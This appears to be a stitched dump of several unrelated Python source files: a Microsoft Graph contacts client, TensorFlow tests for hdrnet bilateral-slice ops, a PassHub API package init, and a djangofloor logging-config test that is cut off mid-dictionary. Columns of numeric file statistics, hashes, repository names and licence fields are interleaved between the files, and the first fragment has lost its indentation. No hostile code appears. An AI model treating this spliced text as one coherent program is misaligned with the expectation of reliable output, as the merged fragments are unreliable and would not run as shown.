pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[MicrosoftGraphExtensionProperty]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_extension_properties.metadata = {'url': '/contacts/microsoft.graph.getAvailableExtensionProperties'} # type: ignore
async def get_by_ids(
self,
body: "models.Paths12Azg33ContactsMicrosoftGraphGetbyidsPostRequestbodyContentApplicationJsonSchema",
**kwargs
) -> List["models.MicrosoftGraphDirectoryObject"]:
"""Invoke action getByIds.
Invoke action getByIds.
:param body: Action parameters.
:type body: ~identity_directory_management.models.Paths12Azg33ContactsMicrosoftGraphGetbyidsPostRequestbodyContentApplicationJsonSchema
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of MicrosoftGraphDirectoryObject, or the result of cls(response)
:rtype: list[~identity_directory_management.models.MicrosoftGraphDirectoryObject]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["models.MicrosoftGraphDirectoryObject"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.get_by_ids.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'Paths12Azg33ContactsMicrosoftGraphGetbyidsPostRequestbodyContentApplicationJsonSchema')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[MicrosoftGraphDirectoryObject]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_ids.metadata = {'url': '/contacts/microsoft.graph.getByIds'} # type: ignore
async def validate_properties(
self,
body: "models.Paths7Cg04SContactsMicrosoftGraphValidatepropertiesPostRequestbodyContentApplicationJsonSchema",
**kwargs
) -> None:
"""Invoke action validateProperties.
Invoke action validateProperties.
:param body: Action parameters.
:type body: ~identity_directory_management.models.Paths7Cg04SContactsMicrosoftGraphValidatepropertiesPostRequestbodyContentApplicationJsonSchema
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.validate_properties.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'Paths7Cg04SContactsMicrosoftGraphValidatepropertiesPostRequestbodyContentApplicationJsonSchema')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
validate_properties.metadata = {'url': '/contacts/microsoft.graph.validateProperties'} # type: ignore
| 48.597488
| 166
| 0.657559
| 7,717
| 73,528
| 6.058313
| 0.035506
| 0.018823
| 0.023101
| 0.018267
| 0.869353
| 0.862701
| 0.853268
| 0.846445
| 0.840606
| 0.82097
| 0
| 0.007133
| 0.241133
| 73,528
| 1,512
| 167
| 48.62963
| 0.830747
| 0.125571
| 0
| 0.808351
| 0
| 0
| 0.124972
| 0.058584
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013919
| false
| 0
| 0.008565
| 0
| 0.08137
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ceb4c45995ecee640c248fb16c082ae0d036f5ae
| 15,840
|
py
|
Python
|
hdrnet/hdrnet_ops_test.py
|
ceciliavision/hdrnet-google
|
867b1aea301a8f78c23ad7153cc0e0d6cb546ec5
|
[
"Apache-2.0"
] | 680
|
2017-09-01T02:48:53.000Z
|
2022-03-30T17:37:19.000Z
|
hdrnet/hdrnet_ops_test.py
|
ceciliavision/hdrnet-google
|
867b1aea301a8f78c23ad7153cc0e0d6cb546ec5
|
[
"Apache-2.0"
] | 18
|
2020-09-22T00:32:08.000Z
|
2022-03-24T15:45:38.000Z
|
hdrnet/hdrnet_ops_test.py
|
ceciliavision/hdrnet-google
|
867b1aea301a8f78c23ad7153cc0e0d6cb546ec5
|
[
"Apache-2.0"
] | 176
|
2017-08-31T13:34:17.000Z
|
2022-03-25T04:36:10.000Z
|
# Lint as: python3
"""Tests for custom tensorflow operators in HDRnet (CUDA only)."""
import collections
import hdrnet_ops as ops
import numpy as np
from parameterized import parameterized
import tensorflow.compat.v1 as tf
def _assert_tf_shape_equals(test_case, expected_shape, tf_tensor):
tf_shape = tf_tensor.shape.as_list()
tf.logging.info('expected_shape: %s, tf_shape: %s', expected_shape, tf_shape)
test_case.assertEqual(expected_shape, tf_shape)
def _assert_np_shape_equals(test_case, expected_shape, np_array):
np_shape = list(np_array.shape)
tf.logging.info('expected_shape: %s, np_shape: %s', expected_shape, np_shape)
test_case.assertEqual(expected_shape, np_shape)
def _assert_shape_equals(test_case, expected_shape, np_array, tf_tensor):
"""Asserts equality on shapes given numpy and tf inputs.
Asserts (using test_case.assertEqual) that both np_array and tf_tensor has
shape expected_shape.
Args:
test_case: (tf.test.TestCase) The TestCase currently being run.
expected_shape: (list of ints) The expected shape.
np_array: (np.ndarray) The input numpy array.
tf_tensor: (tf.Tensor) The input Tensorflow Tensor.
"""
_assert_tf_shape_equals(test_case, expected_shape, tf_tensor)
_assert_np_shape_equals(test_case, expected_shape, np_array)
def _get_device_string(use_gpu):
if use_gpu:
return '/gpu:0'
else:
return '/cpu:0'
_ForwardTestExtents = collections.namedtuple(
'_ForwardTestExtents',
'batch_size, h, w, input_channels, gh, gw, gd, gc, output_channels')
class BilateralSliceTest(tf.test.TestCase):
def run_bilateral_slice(self, grid_data, guide_data, use_gpu):
dev = _get_device_string(use_gpu)
graph = tf.Graph()
with graph.as_default():
with tf.device(dev):
grid_tensor = tf.convert_to_tensor(
grid_data, name='grid', dtype=tf.float32)
guide_tensor = tf.convert_to_tensor(
guide_data, name='guide', dtype=tf.float32)
output_tensor = ops.bilateral_slice(grid_tensor, guide_tensor)
with self.test_session(
graph=graph, use_gpu=use_gpu, force_gpu=use_gpu) as sess:
output_data = sess.run(output_tensor)
return output_data, output_tensor
def run_bilateral_slice_grad(self, grid_data, guide_data, use_gpu):
dev = _get_device_string(use_gpu)
graph = tf.Graph()
with graph.as_default():
with tf.device(dev):
grid_tensor = tf.convert_to_tensor(
grid_data, name='grid', dtype=tf.float32)
guide_tensor = tf.convert_to_tensor(
guide_data, name='guide', dtype=tf.float32)
output_tensor = ops.bilateral_slice(grid_tensor, guide_tensor)
grid_grad_tensor, guide_grad_tensor = tf.gradients(
output_tensor, [grid_tensor, guide_tensor])
with self.test_session(
graph=graph, use_gpu=use_gpu, force_gpu=use_gpu) as sess:
grid_grad_data, guide_grad_data = sess.run(
[grid_grad_tensor, guide_grad_tensor])
return (grid_grad_tensor, guide_grad_tensor, grid_grad_data,
guide_grad_data)
def create_forward_test(self,
batch_size=3,
h=30,
w=25,
input_channels=3,
gh=16,
gw=12,
gd=8,
output_channels=3,
randomize_values=True):
np.random.seed(1234)
gc = output_channels * (1 + input_channels)
grid_shape = (batch_size, gh, gw, gd, gc)
guide_shape = (batch_size, h, w)
if randomize_values:
grid_data = np.random.rand(*grid_shape).astype(np.float32)
guide_data = np.random.rand(*guide_shape).astype(np.float32)
else:
grid_data = np.zeros(grid_shape)
guide_data = np.zeros(guide_shape)
sz = _ForwardTestExtents(batch_size, h, w, input_channels, gh, gw, gd, gc,
output_channels)
return sz, grid_data, guide_data
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_shape(self, use_gpu):
"""bilateral_slice(grid, guide) should have the right shape."""
sz, grid_data, guide_data = self.create_forward_test()
output_data, output_tensor = self.run_bilateral_slice(
grid_data, guide_data, use_gpu)
_assert_shape_equals(self, [sz.batch_size, sz.h, sz.w, sz.gc], output_data,
output_tensor)
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_grad_shape(self, use_gpu):
"""gradient(bilateral_slice(grid, guide)) should have the right shape."""
sz, grid_data, guide_data = self.create_forward_test()
grid_grad_tensor, guide_grad_tensor, grid_grad_data, guide_grad_data = (
self.run_bilateral_slice_grad(grid_data, guide_data, use_gpu))
_assert_shape_equals(self, [sz.batch_size, sz.gh, sz.gw, sz.gd, sz.gc],
grid_grad_data, grid_grad_tensor)
_assert_shape_equals(self, [sz.batch_size, sz.h, sz.w], guide_grad_data,
guide_grad_tensor)
# TODO(jiawen): Read back both CPU and GPU gradients and compare them to each
# other as well as the gradient checker.
def run_grad_test(self, batch_size, h, w, input_channels, gh, gw, gd,
output_channels, grad_tensor_name, use_gpu):
dev = _get_device_string(use_gpu)
gc = (1 + input_channels) * output_channels
grid_shape = [batch_size, gh, gw, gd, gc]
guide_shape = [batch_size, h, w]
output_shape = [batch_size, h, w, gc]
grid_data = np.random.rand(*grid_shape).astype(np.float32)
guide_data = np.random.rand(*guide_shape).astype(np.float32)
tf.reset_default_graph()
graph = tf.Graph()
with graph.as_default():
with tf.device(dev):
grid_tensor = tf.convert_to_tensor(
grid_data, name='grid', dtype=tf.float32)
guide_tensor = tf.convert_to_tensor(
guide_data, name='guide', dtype=tf.float32)
output_tensor = ops.bilateral_slice(grid_tensor, guide_tensor)
if grad_tensor_name == 'grid':
grad_tensor = grid_tensor
grad_shape = grid_shape
elif grad_tensor_name == 'guide':
grad_tensor = guide_tensor
grad_shape = guide_shape
# It is important to use self.test_session, which will disable the
# graph optimization, otherwise it won't use GPU ops. See details here:
# https://github.com/tensorflow/tensorflow/issues/2054
with self.test_session(graph=graph, use_gpu=use_gpu, force_gpu=use_gpu):
err = tf.test.compute_gradient_error(
grad_tensor, grad_shape, output_tensor, output_shape, delta=1e-4)
# Note that the gradient cannot be accurate, as trilinear interpolation
# is not a smooth function. When the interpolated point is on the grid,
# the gradient does not exist. Therefore, the analytical gradient (by
# gradient op, implemented in bilateral_slice.cu.cc) and numerical
# grident (by tf.test.compute_gradient_error) will never match.
self.assertLess(err, 3e-3)
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_grid_gradient(self, use_gpu):
"""True grid derivative should closely match numerical derivative."""
self.run_grad_test(
batch_size=3,
h=8,
w=5,
input_channels=3,
gh=6,
gw=3,
gd=7,
output_channels=4,
use_gpu=use_gpu,
grad_tensor_name='grid')
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_guide_gradient(self, use_gpu):
"""True guide derivative should closely match numerical derivative."""
self.run_grad_test(
batch_size=1,
h=6,
w=18,
input_channels=1,
gh=3,
gw=9,
gd=7,
output_channels=1,
use_gpu=use_gpu,
grad_tensor_name='guide')
class BilateralSliceApplyTest(tf.test.TestCase):
def run_bilateral_slice_apply(self,
grid_data,
guide_data,
input_data,
use_gpu=False):
dev = _get_device_string(use_gpu)
graph = tf.Graph()
with graph.as_default():
with tf.device(dev):
grid_tensor = tf.convert_to_tensor(
grid_data, name='grid', dtype=tf.float32)
guide_tensor = tf.convert_to_tensor(
guide_data, name='guide', dtype=tf.float32)
input_tensor = tf.convert_to_tensor(
input_data, name='input', dtype=tf.float32)
output_tensor = ops.bilateral_slice_apply(
grid_tensor, guide_tensor, input_tensor, has_offset=True)
with self.test_session(
graph=graph, use_gpu=use_gpu, force_gpu=use_gpu) as sess:
output_data = sess.run(output_tensor)
return output_data, output_tensor
def run_bilateral_slice_apply_grad(self,
grid_data,
guide_data,
input_data,
use_gpu=False):
dev = _get_device_string(use_gpu)
graph = tf.Graph()
with graph.as_default():
with tf.device(dev):
grid_tensor = tf.convert_to_tensor(
grid_data, name='grid', dtype=tf.float32)
guide_tensor = tf.convert_to_tensor(
guide_data, name='guide', dtype=tf.float32)
input_tensor = tf.convert_to_tensor(
input_data, name='input', dtype=tf.float32)
output_tensor = ops.bilateral_slice_apply(
grid_tensor, guide_tensor, input_tensor, has_offset=True)
grid_grad_tensor, guide_grad_tensor, _ = tf.gradients(
output_tensor, [grid_tensor, guide_tensor, input_tensor])
with self.test_session(
graph=graph, use_gpu=use_gpu, force_gpu=use_gpu) as sess:
grid_grad_data, guide_grad_data = sess.run(
[grid_grad_tensor, guide_grad_tensor])
return (grid_grad_tensor, guide_grad_tensor, grid_grad_data,
guide_grad_data)
def create_forward_test(self,
batch_size=3,
h=30,
w=25,
input_channels=3,
gh=16,
gw=12,
gd=8,
output_channels=3,
randomize_values=True):
np.random.seed(1234)
gc = output_channels * (1 + input_channels)
grid_shape = (batch_size, gh, gw, gd, gc)
guide_shape = (batch_size, h, w)
input_shape = (batch_size, h, w, input_channels)
if randomize_values:
grid_data = np.random.rand(*grid_shape).astype(np.float32)
guide_data = np.random.rand(*guide_shape).astype(np.float32)
input_data = np.random.rand(*input_shape).astype(np.float32)
else:
grid_data = np.zeros(grid_shape)
guide_data = np.zeros(guide_shape)
input_data = np.zeros(input_shape)
sz = _ForwardTestExtents(batch_size, h, w, input_channels, gh, gw, gd, gc,
output_channels)
return sz, grid_data, guide_data, input_data
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_shape(self, use_gpu):
"""bilateral_slice_apply(grid, guide) should have the right shape."""
sz, grid_data, guide_data, input_data = self.create_forward_test()
output_data, output_tensor = self.run_bilateral_slice_apply(
grid_data, guide_data, input_data, use_gpu)
_assert_shape_equals(self, [sz.batch_size, sz.h, sz.w, sz.output_channels],
output_data, output_tensor)
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_grad_shape(self, use_gpu):
"""grad(bilateral_slice_apply(grid, guide)) should have the right shape."""
sz, grid_data, guide_data, input_data = self.create_forward_test()
grid_grad_tensor, guide_grad_tensor, grid_grad_data, guide_grad_data = (
self.run_bilateral_slice_apply_grad(grid_data, guide_data, input_data,
use_gpu))
_assert_shape_equals(self, [sz.batch_size, sz.gh, sz.gw, sz.gd, sz.gc],
grid_grad_data, grid_grad_tensor)
_assert_shape_equals(self, [sz.batch_size, sz.h, sz.w], guide_grad_data,
guide_grad_tensor)
# TODO(jiawen): Read back both CPU and GPU gradients and compare them to each
# other as well as the gradient checker.
def run_grad_test(self, batch_size, h, w, input_channels, gh, gw, gd,
output_channels, use_gpu, grad_tensor_name):
grid_shape = (batch_size, gh, gw, gd,
(1 + input_channels) * output_channels)
guide_shape = (batch_size, h, w)
input_shape = (batch_size, h, w, input_channels)
output_shape = (batch_size, h, w, output_channels)
grid_data = np.random.rand(*grid_shape).astype(np.float32)
guide_data = np.random.rand(*guide_shape).astype(np.float32)
input_data = np.random.rand(*input_shape).astype(np.float32)
dev = _get_device_string(use_gpu)
tf.reset_default_graph()
graph = tf.Graph()
with graph.as_default():
with tf.device(dev):
grid_tensor = tf.convert_to_tensor(
grid_data, name='grid', dtype=tf.float32)
guide_tensor = tf.convert_to_tensor(
guide_data, name='guide', dtype=tf.float32)
input_tensor = tf.convert_to_tensor(
input_data, name='input', dtype=tf.float32)
output_tensor = ops.bilateral_slice_apply(
grid_tensor, guide_tensor, input_tensor, has_offset=True)
if grad_tensor_name == 'grid':
grad_tensor = grid_tensor
grad_shape = grid_shape
elif grad_tensor_name == 'guide':
grad_tensor = guide_tensor
grad_shape = guide_shape
elif grad_tensor_name == 'input':
grad_tensor = input_tensor
grad_shape = input_shape
# It is important to use self.test_session, which will disable the
# graph optimization, otherwise it won't use GPU ops. See details here:
# https://github.com/tensorflow/tensorflow/issues/2054
with self.test_session(graph=graph, use_gpu=use_gpu, force_gpu=use_gpu):
err = tf.test.compute_gradient_error(grad_tensor, grad_shape,
output_tensor, output_shape)
self.assertLess(err, 1e-2)
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_grid_gradient(self, use_gpu):
"""True grid derivative should closely match numerical derivative."""
self.run_grad_test(
batch_size=3,
h=8,
w=5,
input_channels=3,
gh=6,
gw=3,
gd=7,
output_channels=4,
use_gpu=use_gpu,
grad_tensor_name='grid')
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_guide_gradient(self, use_gpu):
"""True guide derivative should closely match numerical derivative."""
self.run_grad_test(
batch_size=1,
h=6,
w=18,
input_channels=1,
gh=3,
gw=9,
gd=7,
output_channels=1,
use_gpu=use_gpu,
grad_tensor_name='guide')
@parameterized.expand([('CPU', False), ('GPU', True)])
def test_input_gradient(self, use_gpu):
"""True input derivative should closely match numerical derivative."""
self.run_grad_test(
batch_size=3,
h=8,
w=5,
input_channels=3,
gh=6,
gw=3,
gd=7,
output_channels=4,
use_gpu=use_gpu,
grad_tensor_name='input')
if __name__ == '__main__':
tf.test.main()
| 38.26087
| 80
| 0.635669
| 2,114
| 15,840
| 4.450804
| 0.095553
| 0.036348
| 0.016261
| 0.027102
| 0.878521
| 0.858646
| 0.83367
| 0.823361
| 0.81167
| 0.81167
| 0
| 0.01253
| 0.264394
| 15,840
| 413
| 81
| 38.353511
| 0.794971
| 0.125126
| 0
| 0.782334
| 0
| 0
| 0.024473
| 0
| 0
| 0
| 0
| 0.002421
| 0.047319
| 1
| 0.066246
| false
| 0
| 0.015773
| 0
| 0.113565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0cb5dee552c9a9063a932120d91a57d1c0d2b225
| 3,481
|
py
|
Python
|
sightseeingtech_passhub_api/__init__.py
|
BYMdevelopment/passhub-api-client-python
|
13537fe9b03d91aa451eb81a86047d8f715df681
|
[
"MIT"
] | null | null | null |
sightseeingtech_passhub_api/__init__.py
|
BYMdevelopment/passhub-api-client-python
|
13537fe9b03d91aa451eb81a86047d8f715df681
|
[
"MIT"
] | null | null | null |
sightseeingtech_passhub_api/__init__.py
|
BYMdevelopment/passhub-api-client-python
|
13537fe9b03d91aa451eb81a86047d8f715df681
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# flake8: noqa
"""
PassHub API
PassHub API documentation # noqa: E501
OpenAPI spec version: 1.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import apis into sdk package
from sightseeingtech_passhub_api.api.order_record_resource_api import OrderRecordResourceApi
from sightseeingtech_passhub_api.api.product_resource_api import ProductResourceApi
from sightseeingtech_passhub_api.api.vendor_resource_api import VendorResourceApi
from sightseeingtech_passhub_api.api.voucher_resource_api import VoucherResourceApi
# import ApiClient
from sightseeingtech_passhub_api.api_client import ApiClient
from sightseeingtech_passhub_api.configuration import Configuration
# import models into sdk package
from sightseeingtech_passhub_api.models.address import Address
from sightseeingtech_passhub_api.models.condition import Condition
from sightseeingtech_passhub_api.models.delivery_dto import DeliveryDTO
from sightseeingtech_passhub_api.models.extra_validation_param_dto import ExtraValidationParamDTO
from sightseeingtech_passhub_api.models.generic_status_dto import GenericStatusDTO
from sightseeingtech_passhub_api.models.group_entry_dto import GroupEntryDTO
from sightseeingtech_passhub_api.models.json_object import JSONObject
from sightseeingtech_passhub_api.models.map_ofstring_andstring import MapOfstringAndstring
from sightseeingtech_passhub_api.models.order_item import OrderItem
from sightseeingtech_passhub_api.models.order_note_param_dto import OrderNoteParamDTO
from sightseeingtech_passhub_api.models.order_record_dto import OrderRecordDTO
from sightseeingtech_passhub_api.models.order_record_extend_dto import OrderRecordExtendDTO
from sightseeingtech_passhub_api.models.product_dto import ProductDTO
from sightseeingtech_passhub_api.models.product_suggestion import ProductSuggestion
from sightseeingtech_passhub_api.models.recharge_product_group import RechargeProductGroup
from sightseeingtech_passhub_api.models.recharge_prompt import RechargePrompt
from sightseeingtech_passhub_api.models.recharge_prompt_entry import RechargePromptEntry
from sightseeingtech_passhub_api.models.rule import Rule
from sightseeingtech_passhub_api.models.simple_connected_product_dto import SimpleConnectedProductDTO
from sightseeingtech_passhub_api.models.simple_metadata import SimpleMetadata
from sightseeingtech_passhub_api.models.simple_product_connection_dto import SimpleProductConnectionDTO
from sightseeingtech_passhub_api.models.simple_product_dto import SimpleProductDTO
from sightseeingtech_passhub_api.models.suggested_order import SuggestedOrder
from sightseeingtech_passhub_api.models.suggested_order_item import SuggestedOrderItem
from sightseeingtech_passhub_api.models.universal_attribute import UniversalAttribute
from sightseeingtech_passhub_api.models.user_compact_dto import UserCompactDTO
from sightseeingtech_passhub_api.models.user_dto import UserDTO
from sightseeingtech_passhub_api.models.validation_item_status_dto import ValidationItemStatusDTO
from sightseeingtech_passhub_api.models.validation_result import ValidationResult
from sightseeingtech_passhub_api.models.validation_result_entry import ValidationResultEntry
from sightseeingtech_passhub_api.models.vendor_dto import VendorDTO
from sightseeingtech_passhub_api.models.vendor_detail_dto import VendorDetailDTO
from sightseeingtech_passhub_api.models.voucher_pattern import VoucherPattern
| 57.065574
| 103
| 0.904625
| 417
| 3,481
| 7.201439
| 0.261391
| 0.13653
| 0.337662
| 0.376623
| 0.536797
| 0.384282
| 0.190476
| 0
| 0
| 0
| 0
| 0.002152
| 0.065498
| 3,481
| 60
| 104
| 58.016667
| 0.920996
| 0.071818
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.975
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
f046ddc8d25dd3a7fbbfa8cebdf6d6baf9815cfb
| 30,352
|
py
|
Python
|
djangofloor/tests/test_log.py
|
d9pouces/django-floor
|
f4f0986e755c1a2b2d0cd97ed11384dffa9fef35
|
[
"CECILL-B"
] | 11
|
2015-08-04T08:56:10.000Z
|
2020-10-03T11:55:28.000Z
|
djangofloor/tests/test_log.py
|
d9pouces/django-floor
|
f4f0986e755c1a2b2d0cd97ed11384dffa9fef35
|
[
"CECILL-B"
] | 21
|
2015-12-02T07:52:50.000Z
|
2019-08-20T15:55:57.000Z
|
djangofloor/tests/test_log.py
|
d9pouces/django-floor
|
f4f0986e755c1a2b2d0cd97ed11384dffa9fef35
|
[
"CECILL-B"
] | 6
|
2015-11-10T08:36:14.000Z
|
2020-10-23T23:10:02.000Z
|
import os
import platform
import socket
import tempfile
from io import StringIO
from unittest import TestCase
from djangofloor.log import LogConfiguration
excluded_commands = {
"migrate",
"npm",
"sendtestemail",
"clearsessions",
"createsuperuser",
"sqlflush",
"makemigrations",
"startapp",
"compilemessages",
"test",
"flush",
"sqlsequencereset",
"makemessages",
"remove_stale_contenttypes",
"dumpdb",
"collectstatic",
"config",
"dumpdata",
"showmigrations",
"packaging",
"sqlmigrate",
"squashmigrations",
"gen_dev_files",
"createcachetable",
"loaddata",
"shell",
"testserver",
"changepassword",
"dbshell",
"inspectdb",
"check",
"ping_google",
}
class TestLogConfig(TestCase):
maxDiff = None
def setUp(self) -> None:
self.config = LogConfiguration(stdout=StringIO(), stderr=StringIO())
def test_dev_syslog(self):
r = self.config(
{
"DEBUG": False,
"DF_MODULE_NAME": "djangofloor",
"SCRIPT_NAME": "worker",
"LOG_DIRECTORY": None,
"LOG_REMOTE_URL": "syslog://",
"LOG_REMOTE_ACCESS": None,
"SERVER_NAME": "localhost",
"SERVER_PORT": "80",
"LOG_EXCLUDED_COMMANDS": excluded_commands,
"RAVEN_DSN": None,
"LOG_LEVEL": None,
},
argv=["manage.py", "test"],
)
if platform.system() == "Darwin":
address = "/var/run/syslog"
elif platform.system() == "Linux":
address = "/dev/log"
else:
address = ("localhost", 514)
self.assertEqual(
{
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"django.server": {
"()": "djangofloor.log.ServerFormatter",
"format": "%(asctime)s [localhost:80] %(message)s",
},
"nocolor": {
"()": "logging.Formatter",
"fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s",
"datefmt": "%Y-%m-%d %H:%M:%S",
},
"colorized": {"()": "djangofloor.log.ColorizedFormatter"},
},
"filters": {
"remove_duplicate_warnings": {
"()": "djangofloor.log.RemoveDuplicateWarnings"
}
},
"handlers": {
"mail_admins": {
"class": "djangofloor.log.AdminEmailHandler",
"level": "ERROR",
"include_html": True,
},
"syslog.warn": {
"class": "logging.handlers.SysLogHandler",
"level": "WARN",
"address": address,
"facility": 8,
"socktype": socket.SOCK_DGRAM,
},
},
"loggers": {
"django": {"handlers": [], "level": "ERROR", "propagate": True},
"django.db": {"handlers": [], "level": "ERROR", "propagate": True},
"django.db.backends": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"django.request": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"django.security": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"djangofloor.signals": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"gunicorn.error": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"pip.vcs": {"handlers": [], "level": "ERROR", "propagate": True},
"py.warnings": {
"handlers": [],
"level": "ERROR",
"propagate": True,
"filters": ["remove_duplicate_warnings"],
},
"aiohttp.access": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"django.server": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"geventwebsocket.handler": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"gunicorn.access": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
},
"root": {"handlers": ["syslog.warn", "mail_admins"], "level": "WARN"},
},
r,
)
def test_syslog(self):
r = self.config(
{
"DEBUG": False,
"DF_MODULE_NAME": "djangofloor",
"SCRIPT_NAME": "worker",
"LOG_DIRECTORY": None,
"LOG_REMOTE_URL": "syslog://localhost:514/user",
"LOG_REMOTE_ACCESS": None,
"SERVER_NAME": "localhost",
"SERVER_PORT": "80",
"LOG_EXCLUDED_COMMANDS": excluded_commands,
"RAVEN_DSN": None,
"LOG_LEVEL": None,
},
argv=["manage.py", "test"],
)
self.assertEqual(
{
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"django.server": {
"()": "djangofloor.log.ServerFormatter",
"format": "%(asctime)s [localhost:80] %(message)s",
},
"nocolor": {
"()": "logging.Formatter",
"fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s",
"datefmt": "%Y-%m-%d %H:%M:%S",
},
"colorized": {"()": "djangofloor.log.ColorizedFormatter"},
},
"filters": {
"remove_duplicate_warnings": {
"()": "djangofloor.log.RemoveDuplicateWarnings"
}
},
"handlers": {
"mail_admins": {
"class": "djangofloor.log.AdminEmailHandler",
"level": "ERROR",
"include_html": True,
},
"syslog.warn": {
"class": "logging.handlers.SysLogHandler",
"level": "WARN",
"address": ("localhost", 514),
"facility": 1,
"socktype": socket.SOCK_DGRAM,
},
},
"loggers": {
"django": {"handlers": [], "level": "ERROR", "propagate": True},
"django.db": {"handlers": [], "level": "ERROR", "propagate": True},
"django.db.backends": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"django.request": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"django.security": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"djangofloor.signals": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"gunicorn.error": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"pip.vcs": {"handlers": [], "level": "ERROR", "propagate": True},
"py.warnings": {
"handlers": [],
"level": "ERROR",
"propagate": True,
"filters": ["remove_duplicate_warnings"],
},
"aiohttp.access": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"django.server": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"geventwebsocket.handler": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"gunicorn.access": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
},
"root": {"handlers": ["syslog.warn", "mail_admins"], "level": "WARN"},
},
r,
)
def test_syslog_debug(self):
r = self.config(
{
"DEBUG": False,
"DF_MODULE_NAME": "djangofloor",
"SCRIPT_NAME": "worker",
"LOG_DIRECTORY": None,
"LOG_REMOTE_URL": "syslog://localhost:514/user",
